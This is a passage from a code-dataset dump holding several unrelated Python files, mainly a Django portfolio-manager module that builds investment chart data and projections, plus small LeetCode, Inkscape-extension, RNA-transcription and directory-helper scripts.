datetime.date.today().year -1:\n last_yr_contrib += amt\n if yr in deduct:\n for _,amt in deduct[yr].items():\n total_contribution += amt\n if yr == datetime.date.today().year -1:\n last_yr_contrib += amt\n \n '''\n if len(contrib.keys()):\n print('************** time for comparision ***************')\n print('Contribution:\"')\n for yr in range(curr_yr, min(contrib.keys())-1, -1):\n if yr in contrib:\n print(f'{yr}: {contrib[yr]} \\t {contrib2.get(yr,None)}')\n print('Deduction:\"')\n for yr in range(curr_yr, min(deduct.keys())-1, -1):\n if yr in deduct:\n print(f'{yr}: {deduct[yr]} \\t {deduct2.get(yr, None)}')\n print('Total:\"')\n for yr in range(curr_yr, min(total.keys())-1, -1):\n if yr in total:\n print(f'{yr}: {total[yr]} \\t {total2.get(yr, None)}')\n print('************** end of comparision ***************')\n '''\n\n #print('total @299', total)\n if total_contribution: \n avg_contrib = total_contribution/total_years\n '''\n latest_value = 0\n for k,v in total[curr_yr].items():\n latest_value += v\n cash_flows.append((datetime.date.today(), latest_value))\n \n cash_flows = sort_set(cash_flows)\n \n\n if round(latest_value, 2) == round(latest_value2, 2):\n print('same latest values')\n else:\n print('different latest values')\n print('cash flows', cash_flows)\n if cash_flows == cash_flows2:\n print('same cash flows')\n else:\n print('different cash flows')\n i = 0\n while True:\n if i < len(cash_flows):\n till = 5 if len(cash_flows) - i > 5 else len(cash_flows) - i\n print(cash_flows[i:i+till])\n print(cash_flows2[i:i+till])\n i += till\n print('')\n else:\n break\n '''\n #calc_avg_growth = (latest_value-total_contribution)/(total_contribution*total_years)\n 
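# --- Editor's note (illustrative sketch, not part of the original source) ---
# xirr() below comes from elsewhere in this project; this sketch only
# illustrates the convention it is assumed to follow: cash_flows is a list of
# (date, amount) pairs where investments are negative, withdrawals and the
# terminal portfolio value are positive, and the result is an annualised rate.
def xirr_sketch(cash_flows, guess=0.1):
    if not cash_flows:
        return 0
    t0 = cash_flows[0][0]
    def npv(rate):
        return sum(amt / (1.0 + rate) ** ((d - t0).days / 365.0)
                   for d, amt in cash_flows)
    lo, hi = -0.9999, 10.0
    if npv(lo) * npv(hi) > 0:
        return 0  # no sign change, mirroring the "no valid xirr" branch below
    for _ in range(200):  # plain bisection converges well within 200 steps
        mid = (lo + hi) / 2.0
        if npv(lo) * npv(mid) <= 0:
            hi = mid
        else:
            lo = mid
    return (lo + hi) / 2.0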
calc_avg_growth = None\n try:\n calc_avg_growth = xirr(cash_flows, 0.1)\n if calc_avg_growth == 0:\n print(f'couldnt get valid xirr for cashflows {cash_flows}')\n except Exception as ex:\n print(f'Exception {ex} when finding XIRR')\n\n if expected_return:\n avg_growth = expected_return/100\n else:\n avg_growth = calc_avg_growth\n \n goal_obj = Goal.objects.get(id=goal_id)\n goal_end_date = goal_obj.start_date+relativedelta(months=goal_obj.time_period)\n print('*************')\n ret['goal_end_date'] = goal_end_date\n if calc_avg_growth:\n ret['avg_growth'] = int(calc_avg_growth*100)\n ret['latest_value'] = latest_value\n ret['total_contribution'] = total_contribution\n ret['avg_contrib'] = int(avg_contrib)\n ret['last_yr_contrib'] = int(last_yr_contrib)\n print(ret)\n print('*************')\n\n if curr_yr == goal_end_date.year:\n from fixed_deposit.fixed_deposit_helper import get_maturity_value_on_date\n ret['final_projection'] = get_maturity_value_on_date(latest_value, datetime.date.today(), float(avg_growth), goal_end_date)\n else:\n for yr in range(curr_yr+1, goal_end_date.year+1):\n contrib[yr] = dict()\n total[yr] = dict()\n deduct[yr] = dict()\n contrib[yr]['Projected'] = avg_contrib\n if 'Projected' in total[yr-1]:\n total[yr]['Projected'] = (float(total[yr-1]['Projected'])+float(avg_contrib))*(1+float(avg_growth))\n else:\n total[yr]['Projected'] = (float(latest_value)+float(avg_contrib))*(1+float(avg_growth))\n deduct[yr]['Projected'] = 0\n ret['final_projection'] = int(total[yr]['Projected'])\n\n print('contrib', contrib)\n print('deduct', deduct)\n print('total', total)\n colormap = {\n '401K': '#617688', \n 'EPF':'#f15664',\n 'ESPP':'#DC7633',\n 'FD':'#006f75',\n 'PPF':'#92993c',\n 'SSY':'#f9c5c6',\n 'RSU':'#AA12E8',\n 'Shares':'#e31219',\n 'MutualFunds':'#bfff00',\n 'Insurance':'#ede76d',\n 'Projected':'#cbcdd1',\n 'Gold':'#ffd700',\n 'Cash':BankAccountInterface.get_chart_color(),\n 'Crypto':CryptoInterface.get_chart_color()\n }\n data = dict()\n data['labels'] = list()\n data['datasets'] = list()\n for i in sorted (contrib.keys()):\n data['labels'].append(str(i))\n print('data at 294', data)\n\n alloted_types = dict()\n for k,v in contrib.items():\n for typ, val in v.items():\n alloted_types[typ] = None\n\n\n for val in alloted_types.keys():\n centry = dict()\n centry['label'] = val+' contribution'\n centry['type'] = 'bar'\n centry['stack'] = 'contribution'\n centry['backgroundColor'] = colormap[val]\n centry['data'] = list()\n for i in sorted (contrib.keys()):\n centry['data'].append(int(contrib[i].get(val,0)))\n data['datasets'].append(centry)\n\n dentry = dict()\n dentry['label'] = val+ ' deduction'\n dentry['type'] = 'bar'\n dentry['stack'] = 'deduction'\n dentry['backgroundColor'] = colormap[val]\n dentry['data'] = list()\n for i in sorted (contrib.keys()):\n dentry['data'].append(deduct[i].get(val,0))\n data['datasets'].append(dentry)\n\n tentry = dict()\n tentry['label'] = val + ' total'\n tentry['type'] = 'bar'\n tentry['stack'] = 'total'\n tentry['backgroundColor'] = colormap[val]\n tentry['data'] = list()\n for i in sorted (contrib.keys()):\n tentry['data'].append(int(total[i].get(val,0)))\n data['datasets'].append(tentry)\n\n return data, ret\n\n\ndef sort_set(cash_flows):\n ret = list()\n done = list()\n while len(done) < len(cash_flows):\n largest = None\n largest_num = 0\n for i, flow in enumerate(cash_flows):\n if not i in done:\n if not largest:\n largest = flow\n largest_num = i\n else:\n if largest[0] > flow[0]:\n largest = flow\n largest_num = i\n elif 
largest[0] == flow[0]:\n if largest[1] > flow[1]:\n largest = flow\n largest_num = i\n ret.append(largest)\n done.append(largest_num)\n return ret\n\ndef get_goal_target_for_user(user_id):\n goal_objs = Goal.objects.filter(user=user_id)\n target_amt = 0\n for goal_obj in goal_objs:\n target_amt += goal_obj.final_val\n return target_amt\n\ndef get_user_contributions(user_id):\n print(\"inside get_user_contributions\")\n try:\n user_obj = User.objects.get(id=user_id)\n contrib = dict()\n contrib['distrib_colors'] = list()\n contrib['distrib_vals'] = list()\n contrib['distrib_labels'] = list()\n contrib['target'] = int(get_goal_target_for_user(user_id))\n contrib['EPF'] = int(EpfInterface.get_amount_for_user(user_id))\n contrib['ESPP'] = int(EsppInterface.get_amount_for_user(user_id))\n contrib['FD'] = int(FdInterface.get_amount_for_user(user_id))\n contrib['PPF'] =int(PpfInterface.get_amount_for_user(user_id))\n contrib['SSY'] =int(SsyInterface.get_amount_for_user(user_id))\n contrib['RSU'] = int(RsuInterface.get_amount_for_user(user_id))\n contrib['Insurance'] = int(InsuranceInterface.get_amount_for_user(user_id))\n contrib['Shares'] = int(ShareInterface.get_amount_for_user(user_id))\n contrib['MutualFunds'] = int(MfInterface.get_amount_for_user(user_id))\n contrib['401K'] = int(R401KInterface.get_amount_for_user(user_id))\n contrib['Gold'] = int(GoldInterface.get_amount_for_user(user_id))\n contrib['Cash'] = int(BankAccountInterface.get_amount_for_user(user_id))\n contrib['Crypto'] = int(CryptoInterface.get_amount_for_user(user_id))\n contrib['equity'] = contrib['ESPP']+contrib['RSU']+contrib['Shares']+contrib['MutualFunds']+contrib['401K']+contrib['Insurance']\n contrib['debt'] = contrib['EPF'] + contrib['FD'] + contrib['PPF'] + contrib['SSY']\n contrib['total'] = contrib['equity'] + contrib['debt'] + contrib['Gold'] + contrib['Cash'] + contrib['Crypto']\n \n item_color_mapping = {\n 'EPF': '#f15664',\n 'ESPP': '#DC7633',\n 'FD': '#006f75',\n 'PPF':'#92993c',\n 'SSY':'#f9c5c6', \n 'RSU': '#AA12E8', \n 'Shares': '#e31219', \n 'MutualFunds': '#bfff00',\n '401K': '#617688',\n 'Insurance': '#ede76d',\n 'Gold': '#ffd700',\n 'Cash': BankAccountInterface.get_chart_color(),\n 'Crypto': CryptoInterface.get_chart_color()\n }\n for k,v in item_color_mapping.items():\n if contrib[k] > 0:\n contrib['distrib_vals'].append(contrib[k])\n contrib['distrib_colors'].append(v)\n contrib['distrib_labels'].append(k)\n\n print(\"contrib:\", contrib)\n return contrib\n except User.DoesNotExist:\n print(\"User with id \", user_id, \" does not exist\" )\n pass\n except Exception as ex:\n print(f\"Exception getting user contribution for user with id: {str(user_id)} {ex}\")\n\n# home chart view\ndef get_investment_data(start_date):\n data_start_date = start_date+ relativedelta(months=-1)\n\n epf_data = list()\n ppf_data = list()\n ssy_data = list()\n fd_data = list()\n espp_data = list()\n rsu_data = list()\n shares_data = list()\n mf_data = list()\n r401k_data = list()\n insurance_data = list()\n gold_data = list()\n cash_data = list()\n loan_data = list()\n crypto_data = list()\n total_data = list()\n\n total_epf = 0\n total_ppf = 0\n total_ssy = 0\n\n epf_reset_on_zero = False\n fd_reset_on_zero = False\n r401k_reset_on_zero = False\n ppf_reset_on_zero = False\n ssy_reset_on_zero = False\n espp_reset_on_zero = False\n rsu_reset_on_zero = False\n shares_reset_on_zero = False\n mf_reset_on_zero = False\n insurance_reset_on_zero = False\n crypto_reset_on_zero = False\n gold_reset_on_zero = False\n cash_reset_on_zero 
= False\n loan_reset_on_zero = False\n total_reset_on_zero = False\n\n share_qty = dict()\n mf_qty = dict()\n today = datetime.date.today()\n data_end_date = data_start_date\n while True:\n if data_end_date == today:\n break\n\n print('Calculating for the month', data_start_date)\n total = 0\n data_end_date = data_start_date + relativedelta(months=+1)\n if data_end_date > today:\n data_end_date = today\n\n epf_entries = EpfEntry.objects.filter(trans_date__year=data_start_date.year, trans_date__month=data_start_date.month)\n for epf_entry in epf_entries:\n total_epf += int(epf_entry.employee_contribution) + int(epf_entry.employer_contribution) + int(epf_entry.interest_contribution) - int(epf_entry.withdrawl)\n if total_epf != 0:\n if not epf_reset_on_zero:\n epf_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n epf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':total_epf})\n total += total_epf\n epf_reset_on_zero = True\n elif epf_reset_on_zero:\n epf_reset_on_zero = False\n epf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n ppf_entries = PpfEntry.objects.filter(trans_date__year=data_start_date.year, trans_date__month=data_start_date.month)\n for ppf_entry in ppf_entries:\n if ppf_entry.entry_type.lower() == 'cr' or ppf_entry.entry_type.lower() == 'credit':\n total_ppf += int(ppf_entry.amount)\n else:\n total_ppf -= int(ppf_entry.amount)\n if total_ppf != 0:\n if not ppf_reset_on_zero:\n ppf_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n ppf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':total_ppf})\n total += total_ppf\n ppf_reset_on_zero = True\n elif ppf_reset_on_zero:\n ppf_reset_on_zero = False\n ppf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n ssy_entries = SsyEntry.objects.filter(trans_date__year=data_start_date.year, trans_date__month=data_start_date.month)\n for ssy_entry in ssy_entries:\n if ssy_entry.entry_type.lower() == 'cr' or ssy_entry.entry_type.lower() == 'credit':\n total_ssy += int(ssy_entry.amount)\n else:\n total_ssy -= int(ssy_entry.amount)\n if total_ssy != 0:\n if not ssy_reset_on_zero:\n ssy_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n ssy_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':total_ssy})\n total += total_ssy\n ssy_reset_on_zero = True\n elif ssy_reset_on_zero:\n ssy_reset_on_zero = False\n ssy_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n fd_entries = FixedDeposit.objects.filter(start_date__lte=data_start_date, mat_date__gte=data_end_date)\n fd_val = 0\n for fd in fd_entries:\n time_period = data_end_date-fd.start_date\n _, val = get_maturity_value(float(fd.principal), fd.start_date.strftime('%Y-%m-%d'), float(fd.roi), time_period.days)\n fd_val += val\n if fd_val != 0:\n if not fd_reset_on_zero:\n fd_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n fd_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':fd_val})\n total += fd_val\n fd_reset_on_zero = True\n elif fd_reset_on_zero:\n fd_reset_on_zero = False\n fd_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n r401k_val = get_r401k_value_as_on(data_end_date)\n if r401k_val != 0:\n if not r401k_reset_on_zero:\n r401k_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n r401k_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':r401k_val})\n total += r401k_val\n r401k_reset_on_zero = True\n elif r401k_reset_on_zero:\n r401k_reset_on_zero = False\n r401k_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n try:\n 
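# --- Editor's note (illustrative sketch, not part of the original source) ---
# Each asset class in this loop repeats the same "*_reset_on_zero" charting
# idiom: when a series first becomes non-zero, anchor it at y=0 so the line
# rises from the axis, and when it drops back to zero, close it with a final
# y=0 point. The hypothetical helper below captures that idiom in one place:
def append_series_point(series, started, start_d, end_d, value):
    if value != 0:
        if not started:
            series.append({'x': start_d.strftime('%Y-%m-%d'), 'y': 0})
        series.append({'x': end_d.strftime('%Y-%m-%d'), 'y': value})
        return True  # series is now "live"
    if started:
        series.append({'x': end_d.strftime('%Y-%m-%d'), 'y': 0})
        return False  # series has gone back to zero
    return started
# e.g. epf_reset_on_zero = append_series_point(epf_data, epf_reset_on_zero,
#                                              data_start_date, data_end_date, total_epf)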
insurance_val = InsuranceInterface.get_value_as_on(data_end_date)\n if insurance_val != 0:\n if not insurance_reset_on_zero:\n insurance_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n insurance_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':insurance_val})\n total += insurance_val\n insurance_reset_on_zero = True\n elif insurance_reset_on_zero:\n insurance_reset_on_zero = False\n insurance_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for insurance as on {data_end_date}')\n \n try:\n crypto_val = CryptoInterface.get_value_as_on(data_end_date)\n if crypto_val != 0:\n if not crypto_reset_on_zero:\n crypto_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n crypto_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':crypto_val})\n total += crypto_val\n crypto_reset_on_zero = True\n elif crypto_reset_on_zero:\n crypto_reset_on_zero = False\n crypto_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for crypto as on {data_end_date}')\n\n try:\n gold_val = GoldInterface.get_value_as_on(data_end_date)\n if gold_val != 0:\n if not gold_reset_on_zero:\n gold_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n gold_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':gold_val})\n print(f'type of data: {type(total)} {type(gold_val)}')\n total += gold_val\n gold_reset_on_zero = True\n elif gold_reset_on_zero:\n gold_reset_on_zero = False\n gold_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for gold as on {data_end_date}')\n \n try:\n cash_val = BankAccountInterface.get_value_as_on(data_end_date)\n if cash_val != 0:\n if not cash_reset_on_zero:\n cash_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n cash_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':cash_val})\n print(f'type of data: {type(total)} {type(cash_val)}')\n total += cash_val\n cash_reset_on_zero = True\n elif cash_reset_on_zero:\n cash_reset_on_zero = False\n cash_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for cash as on {data_end_date}')\n\n espp_entries = Espp.objects.filter(purchase_date__lte=data_end_date)\n espp_val = 0\n for espp_entry in espp_entries:\n #print(\"espp entry\")\n avail_units = espp_entry.shares_purchased\n for sell_trans in EsppSellTransactions.objects.filter(espp=espp_entry, trans_date__lte=data_end_date):\n avail_units -= sell_trans.units\n\n if avail_units > 0:\n try:\n stock = Stock.objects.get(symbol=espp_entry.symbol, exchange=espp_entry.exchange)\n historical_stock_prices = get_historical_stock_price(stock, data_end_date+relativedelta(days=-5), data_end_date)\n for val in historical_stock_prices:\n found = False\n #print(val)\n for k,v in val.items():\n if espp_entry.exchange in ['NYSE', 'NASDAQ']:\n conv_val = get_in_preferred_currency(1, 'USD', data_end_date)\n #print('conversion value', conv_val)\n if conv_val:\n espp_val += float(conv_val)*float(v)*float(avail_units)\n found = True\n break\n else:\n espp_val += float(v)*float(avail_units)\n found = True\n break\n if found:\n break\n except Stock.DoesNotExist:\n pass\n if espp_val != 0:\n if not espp_reset_on_zero:\n espp_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n 
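# --- Editor's note (illustrative sketch, not part of the original source) ---
# The ESPP/RSU/share valuations in this function all repeat the same
# conversion step: US-listed holdings are priced in USD and converted via the
# project's get_in_preferred_currency() helper (signature as used above).
# A condensed sketch of that step, under the same assumptions:
def holding_value(units, price, exchange, as_of):
    if exchange in ('NYSE', 'NASDAQ'):
        conv_val = get_in_preferred_currency(1, 'USD', as_of)
        if conv_val:
            return float(conv_val) * float(price) * float(units)
    return float(price) * float(units)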
espp_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(espp_val)})\n total += espp_val\n espp_reset_on_zero = True\n elif espp_reset_on_zero:\n espp_reset_on_zero = False\n espp_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n rsu_entries = RestrictedStockUnits.objects.filter(vest_date__lte=data_end_date)\n rsu_val = 0\n for rsu_entry in rsu_entries:\n print(\"rsu entry\")\n su = 0\n for st in RSUSellTransactions.objects.filter(rsu_vest=rsu_entry, trans_date__lte=data_end_date):\n su += float(st.units)\n unsold_shares = float(rsu_entry.shares_for_sale) - su\n if unsold_shares > 0:\n try:\n stock = Stock.objects.get(symbol=rsu_entry.award.symbol, exchange=rsu_entry.award.exchange)\n historical_stock_prices = get_historical_stock_price(stock, data_end_date+relativedelta(days=-5), data_end_date)\n for val in historical_stock_prices:\n found = False\n #print(val)\n for k,v in val.items():\n if stock.exchange in ['NYSE', 'NASDAQ']:\n conv_val = get_in_preferred_currency(1, 'USD', data_end_date)\n #print('conversion value', conv_val)\n if conv_val:\n rsu_val += float(conv_val)*float(v)*unsold_shares\n found = True\n break\n else:\n rsu_val += float(v)*unsold_shares\n found = True\n break\n if found:\n break\n except Stock.DoesNotExist:\n pass\n if rsu_val != 0:\n if not rsu_reset_on_zero:\n rsu_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n rsu_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(rsu_val)})\n total += rsu_val\n rsu_reset_on_zero = True\n elif rsu_reset_on_zero:\n rsu_reset_on_zero = False\n rsu_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n share_transactions = Transactions.objects.filter(trans_date__range=(data_start_date, data_end_date))\n for trans in share_transactions:\n uni_name = trans.share.exchange+'-'+trans.share.symbol\n if uni_name not in share_qty:\n share_qty[uni_name] = 0\n if trans.trans_type == 'Buy':\n share_qty[uni_name] += trans.quantity\n else:\n share_qty[uni_name] -= trans.quantity\n if len(share_transactions) == 0:\n print(f'no transactions in shares in date range {data_start_date} and {data_end_date}')\n share_val = 0\n for s,q in share_qty.items():\n exchange = s[0:s.find('-')]\n symbol = s[s.find('-')+1:]\n stock_obj = add_common_stock(exchange=exchange, symbol=symbol, start_date=data_end_date)\n if stock_obj:\n if float(q) > 0:\n historical_stock_prices = get_historical_stock_price(stock_obj, data_end_date+relativedelta(days=-5), data_end_date)\n for val in historical_stock_prices:\n found = False\n #print(val)\n for k,v in val.items():\n if stock_obj.exchange in ['NYSE', 'NASDAQ']:\n conv_val = get_in_preferred_currency(1, 'USD', data_end_date)\n #print('conversion value', conv_val)\n if conv_val:\n share_val += float(conv_val)*float(v)*float(q)\n found = True\n break\n else:\n share_val += float(v)*float(q)\n found = True\n break\n if found:\n break\n else:\n print(f'{exchange} {symbol} quantity 0 by {data_end_date}')\n else:\n print(f'couldnt create stock object {s}')\n if share_val != 0:\n print(f'share value is not zero {share_val}')\n if not shares_reset_on_zero:\n shares_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n shares_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(share_val)})\n total += share_val\n shares_reset_on_zero = True\n elif shares_reset_on_zero:\n shares_reset_on_zero = False\n shares_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n folio_transactions = 
MutualFundTransaction.objects.filter(trans_date__range=(data_start_date, data_end_date))\n for trans in folio_transactions:\n uni_name = trans.folio.fund.code\n if uni_name not in mf_qty:\n mf_qty[uni_name] = 0\n if trans.trans_type == 'Buy':\n mf_qty[uni_name] += trans.units\n else:\n mf_qty[uni_name] -= trans.units\n mf_val = 0\n for s,q in mf_qty.items():\n fund_obj = MutualFund.objects.get(code=s)\n if fund_obj:\n if float(q) > 0:\n historical_mf_prices = get_historical_mf_nav(s, data_end_date+relativedelta(days=-5), data_end_date)\n for val in historical_mf_prices:\n found = False\n for k,v in val.items():\n mf_val += float(v)*float(q)\n found = True\n break\n if found:\n break\n else:\n print(f'{s} quantity 0 by {data_end_date}')\n if mf_val != 0:\n if not mf_reset_on_zero:\n mf_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n mf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(mf_val)})\n total += mf_val\n mf_reset_on_zero = True\n elif mf_reset_on_zero:\n mf_reset_on_zero = False\n mf_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n \n try:\n loan_val = BankAccountInterface.get_loan_value_as_on(data_end_date)\n if loan_val != 0:\n if not loan_reset_on_zero:\n loan_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n loan_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':loan_val})\n total += loan_val\n loan_reset_on_zero = True\n elif loan_reset_on_zero:\n loan_reset_on_zero = False\n loan_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n except Exception as ex:\n print(f'exception {ex} when getting values for loan as on {data_end_date}')\n\n if total != 0:\n if not total_reset_on_zero:\n total_data.append({'x':data_start_date.strftime('%Y-%m-%d'),'y':0})\n total_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':int(total)})\n total_reset_on_zero = True\n elif total_reset_on_zero:\n total_reset_on_zero = False\n total_data.append({'x':data_end_date.strftime('%Y-%m-%d'),'y':0})\n\n data_start_date = data_start_date+relativedelta(months=+1)\n print('shares data is:',shares_data)\n\n rv = {\n 'gold':gold_data, \n 'ppf':ppf_data, \n 'insurance':insurance_data, \n '401K': r401k_data, \n 'epf':epf_data, \n 'ssy':ssy_data, \n 'fd': fd_data, \n 'espp': espp_data, \n 'rsu':rsu_data, \n 'shares':shares_data, \n 'mf':mf_data,\n 'cash': cash_data,\n 'loan': loan_data,\n 'crypto': crypto_data,\n 'total':total_data\n }\n \n print(f'returning {rv}')\n return rv\n","repo_name":"krishnakuruvadi/portfoliomanager","sub_path":"src/shared/handle_chart_data.py","file_name":"handle_chart_data.py","file_ext":"py","file_size_in_byte":52907,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"68"} +{"seq_id":"27473003990","text":"\r\nclass Solution:\r\n def floodFill(self, image, sr: int, sc: int, newColor: int) :\r\n\r\n if 0 <= sr < len(image) and 0 <= sc < len(image[0]) :\r\n oldColor = image[sr][sc]\r\n if oldColor == newColor :\r\n return image\r\n image[sr][sc] = newColor\r\n if 0 <= sr+1 < len(image) and 0 <= sc < len(image[0]) and image[sr+1][sc] == oldColor:\r\n self.floodFill(image, sr+1, sc, newColor) #bottom\r\n if 0 <= sr-1 < len(image) and 0 <= sc < len(image[0]) and image[sr-1][sc] == oldColor:\r\n self.floodFill(image, sr-1, sc, newColor) #up\r\n if 0 <= sr < len(image) and 0 <= sc-1 < len(image[0]) and image[sr][sc-1] == oldColor:\r\n self.floodFill(image, sr, sc-1, newColor) #left\r\n if 0 <= sr < len(image) and 0 <= sc+1 < len(image[0]) and image[sr][sc+1] == oldColor:\r\n 
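# --- Editor's note (illustrative sketch, not part of the original source) ---
# The recursive floodFill in this record recurses once per filled pixel, so a
# large region can hit Python's default recursion limit. An equivalent
# iterative version using an explicit queue avoids that:
from collections import deque

def flood_fill_iterative(image, sr, sc, new_color):
    old_color = image[sr][sc]
    if old_color == new_color:
        return image
    queue = deque([(sr, sc)])
    while queue:
        r, c = queue.popleft()
        if 0 <= r < len(image) and 0 <= c < len(image[0]) and image[r][c] == old_color:
            image[r][c] = new_color
            queue.extend([(r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)])
    return image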
self.floodFill(image, sr, sc+1, newColor) #right\r\n\r\n return image\r\n\r\n def inImage(self, image, sr, sc) :\r\n return 0 <= sr < len(image) and 0 <= sc < len(image[0])\r\n \r\n def isOldClr(self, image, sr, sc, oldColor) :\r\n return image[sr][sc] == oldColor\r\n\r\ns = Solution()\r\nprint(s.floodFill([[0,0,0],[0,1,1]], 1, 1, 1))\r\n\r\n","repo_name":"TejasviniK/LeetCode","sub_path":"FloodFill.py","file_name":"FloodFill.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"37056021458","text":"#!/usr/bin/env python\n\nimport threading\nimport webbrowser\n\nimport inkex\n\nclass VisitWebSiteWithoutLockingInkscape(threading.Thread):\n def __init__(self, url):\n threading.Thread.__init__ (self)\n self.url = url\n\n def run(self):\n webbrowser.open(self.url)\n\nclass FollowLink(inkex.Effect):\n def __init__(self):\n inkex.Effect.__init__(self)\n\n def effect(self):\n if (self.options.ids):\n for id, node in self.selected.iteritems():\n if node.tag == inkex.addNS('a','svg'):\n self.url = node.get(inkex.addNS('href','xlink'))\n vwswli = VisitWebSiteWithoutLockingInkscape(self.url)\n vwswli.start()\n #inkex.errormsg(\"Link: %s\" % self.url)\n break\n\n\nif __name__ == '__main__':\n e = FollowLink()\n e.affect(output=False)\n\n# vim: expandtab shiftwidth=4 tabstop=8 softtabstop=4 fileencoding=utf-8 textwidth=99\n","repo_name":"valerioa/Inkscape-MacOS-Curated-Build","sub_path":"share/extensions/inkscape_follow_link.py","file_name":"inkscape_follow_link.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"68"} +{"seq_id":"40730338119","text":"def to_rna(dna):\r\n\trna_dict={'A': 'U' , 'C': 'G' , 'G': 'C' , 'T': 'A' }\r\n\t# Bind two separate lists; the original \"list1=list2=[]\" aliased one list,\r\n\t# so iterating list1 while appending to list2 never terminated\r\n\tlist1, list2 = [], []\r\n\tfor i in dna:\r\n\t\tlist1.append(i)\r\n\r\n\tfor i in list1:\r\n\r\n\t\tif i in rna_dict.keys():\r\n\t\t\tlist2.append(rna_dict[i])\r\n\r\n\t\telse:\r\n\t\t\tlist2.append(i)\r\n\r\n\trna=''.join(list2)\t\t\r\n\r\n\t\r\n\treturn rna\r\n\r\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/rna-transcription/4b70213776b64866b4b4be0dff167623.py","file_name":"4b70213776b64866b4b4be0dff167623.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"36885986612","text":"import sys\nimport os.path\nimport os\n'''\nThis function behaves like File.mkdirs() in Java\n'''\ndef mkdir(path):\n # Strip leading/trailing whitespace\n path = path.strip()\n\n if os.path.isabs(path):\n isExists = os.path.exists(path)\n # Check whether the path already exists\n if not isExists:\n # If it does not exist, create the directory\n # (os.makedirs creates intermediate directories)\n os.makedirs(path)\n return True\n else:\n # Get the current working directory\n currentPath = os.getcwd()\n # Strip trailing \\ or / characters\n path = currentPath + '/' + path.rstrip(\"\\\\|/\")\n os.makedirs(path)\n\n\n#############################################################\n# main\n############################################################\nif __name__ == '__main__':\n # Define the directory to create\n path = 'E:/pythontest/python_gdal_testdata/shp/'\n path = 'testdata/testdir/'\n # Call the function\n mkdir(path)","repo_name":"ghsourcecode/rastershp_gdal_python","sub_path":"util/makedirs.py","file_name":"makedirs.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"20650747035","text":"import csv\nimport os\nimport glob\nimport re\nimport datetime\nimport sys\nimport shutil\nimport 
